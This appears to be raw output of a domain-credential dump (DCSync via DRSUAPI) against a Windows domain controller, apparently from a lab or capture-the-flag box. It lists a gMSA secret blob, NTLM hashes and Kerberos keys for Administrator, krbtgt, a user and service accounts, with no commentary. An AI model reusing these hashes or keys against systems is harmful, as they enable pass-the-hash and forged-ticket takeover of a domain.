0100 22 68 1E D1 09 20 E2 26 7D 89 BE 11 9D 65 16 CC "h... .&}....e..
0110 00 00 9C 0A 85 37 44 17 00 00 9C AC B4 84 43 17 .....7D.......C.
0120 00 00 ..
_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744:01000000220100001000000012011a0178723b4877d13cbc7b540eec5053483b2a4ef3914aeb7ad5b5c595646f8e9aea8b4e73d1540a6d6133707e2355121dbd9a575d6c3b69a2371e4619a9c91312b8ddda9ee6763e129291673204c2b0c39174de78c0fec11ca7987294ab5af9b64385c8ff2b943a83879905b1dc9c0462f801fbf77c996b6c361b307ae9253845e12fce97ea98495dccb927a7b5f9bf15011b04c4fddd3ff366006f17de306883fed40b7b2fa93a76a4488ef836f5c84e0b40770c5eb17c71dfbc1c9081dadc8ea3b68286c2f71933b43da9bb8d508015a98b61bafc65f77dc60bfab912aaa33e87f7748bf3a561bd6874b4936af2d33df922681ed10920e2267d89be119d6516cc00009c0a8537441700009cacb48443170000
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b325100ee400c16d56c42f9685381139:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3198641a390fccf87a72629f8fd1bd37:::
enox:1103:aad3b435b51404eeaad3b435b51404ee:bddb2a060aac3fb97c34707fabee7f30:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:1561bd404f929907a89517d421b5f11b:::
svc_apache$:1105:aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d4e135e862ea6eae8575861230af84537d6dfa12720e328644822c20b2e911bf
Administrator:aes128-cts-hmac-sha1-96:8a9270d02cbbf911389a41b84af0cc5c
Administrator:des-cbc-md5:f84ae602a7c776b9
krbtgt:aes256-cts-hmac-sha1-96:fb2e36d495211856960c999f084261baf29a6a45633e796ca4a9c1f64b2c8923
krbtgt:aes128-cts-hmac-sha1-96:980738f8c26c4b660232c9e3de44c470
krbtgt:des-cbc-md5:d35e621aab321657
enox:aes256-cts-hmac-sha1-96:812e3f3bc88f59b0e61db203bbeb6ae42c62902c54a7272da4ce0b2e1e3bace2
enox:aes128-cts-hmac-sha1-96:fe6482cb86521263843a934de85de785
enox:des-cbc-md5:5b38078552bcfd64
DC01$:aes256-cts-hmac-sha1-96:a2000c9407dde22d68141793f38ab597d51ef52f9d75f86b67dd2d40c2fcf822
DC01$:aes128-cts-hmac-sha1-96:4f92fc3abc447b0e56f8d140870741f7
DC01$:des-cbc-md5:1cc1c2b6dfb6437a
svc_apache$:aes256-cts-hmac-sha1-96:17299939ac6048bb2a61331b99a7c836920df04c17bfb903bf820a55a5f5854a
svc_apache$:aes128-cts-hmac-sha1-96:2807a326311ae348978deb52ea80c937
svc_apache$:des-cbc-md5:cee9c13708c27f13
[*] Cleaning up...